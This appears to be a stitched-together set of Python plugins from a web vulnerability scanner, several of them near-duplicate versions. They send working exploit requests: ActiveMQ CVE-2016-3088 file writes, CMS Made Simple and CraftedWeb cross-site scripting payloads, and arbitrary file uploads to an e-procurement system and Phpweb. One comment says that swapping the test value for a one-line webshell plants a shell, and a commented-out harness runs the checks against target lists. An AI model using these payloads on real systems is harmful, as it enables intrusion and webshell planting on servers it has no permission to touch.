def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: PayloadPoc = "/fileserver/Medusa.txt" PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc PayloadCode = ClassCongregation.randoms().result(50)+'@Medusa' Headers["Connection"]="close" s = requests.session() resp = s.put(PayloadUrl, data=PayloadCode, headers=Headers, proxies=proxies,timeout=3,verify=False) code = resp.status_code resp2=s.get(PayloadUrl, headers=Headers,proxies=proxies, timeout=3).text if code==204 and resp2.find(PayloadCode)!=-1: Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php" data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert({})%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''.format( RD) payload_url = url + payload resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '''<a href="$("<img/src='x'/onerror=alert()>'''.format( RD)) != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/cmsms2.2.7/admin/siteprefs.php" data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search''' payload_url = scheme + "://" + url +":"+ str(port) + payload resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/cmsms2.2.7/admin/siteprefs.php" data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search''' payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: PayloadPoc = "/fileserver/Medusa.txt" PayloadUrl = url + PayloadPoc PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa' Headers["Connection"] = "close" s = requests.session() resp = s.put(PayloadUrl, data=PayloadCode, headers=Headers, proxies=proxies, timeout=3, verify=False) code = resp.status_code resp2 = s.get(PayloadUrl, headers=Headers, proxies=proxies, timeout=3).text if code == 204 and resp2.find(PayloadCode) != -1: Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format( url, PayloadUrl, PayloadCode) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format( RD) payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1: Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert({})</script>&m1_filename=Adherents-0.2.6.xml".format( RD) payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1: Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(RD) payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('<script>alert({})</script>'.format(RD)) != -1 : Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,Token,proxies=None): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD=ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD) payload_url = scheme + "://" + url +":"+ str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data,headers=headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: PayloadPoc = "/fileserver/Medusa.txt" PayloadUrl = scheme + '://' + url + ':' + str(port) + PayloadPoc PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa' headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', } s = requests.session() resp = s.put(PayloadUrl, data=PayloadCode, headers=headers, proxies=proxies, timeout=3, verify=False) code = resp.status_code resp2 = s.get(PayloadUrl, headers=headers, proxies=proxies, timeout=3).text if code == 204 and resp2.find(PayloadCode) != -1: Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format( url, PayloadUrl, PayloadCode) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD=ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD) payload_url = url + payload resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find(RD) != -1 : Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = ClassCongregation.randoms().result(20) payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format( RD) payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find(RD) != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = ClassCongregation.randoms().result(20) payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format( RD) payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '<script>alert({})</script>'.format(RD)) != -1: Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
# # except: # pass # !/usr/bin/env python # -*- coding: utf-8 -*- # if __name__ == '__main__': # UrlList=[] # ThredList=[] # la=[] # with open("6.txt", 'r', encoding='UTF-8') as f: # line = f.readline() # while line: # ThredList.append(threading.Thread(target=medusa, args=(line.strip("\r\n",),"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",),kwargs={"Uid":"Ayanami Rei","Sid":"Soryu Asuka Langley"})) # line = f.readline() # for t in ThredList: # 开启列表中的多线程 # t.start() # for p in ThredList: # 开启列表中的多线程 # p.join() # medusa("","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36") #celery -A Web.Workbench.Tasks worker --loglevel=info --pool=solo #python3 manage.py runserver 0.0.0.0:9999 #mitmdump -s ProxyServer.py --proxyauth any --listen-host "0.0.0.0" --listen-port 9747 #.\redis-server.exe redis.windows.conf # git commit -m "v0.82.3:palm_tree:" #find . -type d -name '__pycache__' | xargs rm -rf import ClassCongregation for i in range(1, 100000): a = ClassCongregation.randoms().result(10) print(a)
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/library/editornew/Editor/img_save.asp" payload_url = url + payload data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert {} ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''.format(RD).encode('utf-8') Headers['Content-Type'] = 'application/x-www-form-urlencoded' Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con) if match: payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group( 1) resp2 = requests.get(payload_url2, headers=Headers, timeout=6, proxies=proxies, verify=False) con2 = resp2.text code2 = resp2.status_code #如果要上传shell直接把testvul这个值改为一句话就可以 if code2 == 200 and con2.lower().find(RD) != -1: Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = ClassCongregation.randoms().result(20) payload = "/library/editornew/Editor/img_save.asp" payload_url = scheme + "://" + url + ":" + str(port) + payload data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert {} ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''.format(RD) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con) if match: payload_url2 = scheme + "://" + url + ":" + str( port) + "/library/editornew/Editor/NewImage/" + match.group(1) resp2 = s.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False) con2 = resp2.text code2 = resp2.status_code #如果要上传shell直接把testvul这个值改为一句话就可以 if code2 == 200 and con2.lower().find(RD) != -1: Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload1 = "/base/post.php" payload_url1 = url + payload1 dada = "act=appcode" payload2 = "/base/appfile.php" payload_url2 = url + payload2 ran = ClassCongregation.randoms().result(10) payload_url3 = url + "/effect/source/bg/{}.txt".format(ran) Headers1 = Headers Headers2 = Headers Headers1['Accept'] = '*/*' Headers1['Content-Type'] = 'application/x-www-form-urlencoded' Headers2['Accept'] = '*/*' Headers2[ 'Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE' resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=Headers1, timeout=5, verify=False) con = resp.text k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值 md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest() dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en) resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=Headers2, timeout=5, verify=False) resp3 = requests.get(payload_url3, headers=Headers1, proxies=proxies, timeout=5, verify=False) code3 = resp3.status_code con3 = resp3.text if code3 == 200 and con3.find(ran) != -1: Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url2, dada2, payload_url3, con3) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp3, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload1 = "/base/post.php" payload_url1 = scheme + '://' + url + ':' + str(port) + payload1 dada = "act=appcode" payload2 = "/base/appfile.php" payload_url2 = scheme + '://' + url + ':' + str(port) + payload2 ran = ClassCongregation.randoms().result(10) payload_url3 = scheme + '://' + url + ':' + str( port) + "/effect/source/bg/{}.txt".format(ran) headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', } headers2 = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE', } resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=headers, timeout=5, verify=False) con = resp.text k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值 md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest() dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en) resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=headers2, timeout=5, verify=False) resp3 = requests.get(payload_url3, headers=headers, proxies=proxies, timeout=5, verify=False) code3 = resp3.status_code con3 = resp3.text if code3 == 200 and con3.find(ran) != -1: Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url2, dada2, payload_url3, con3) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类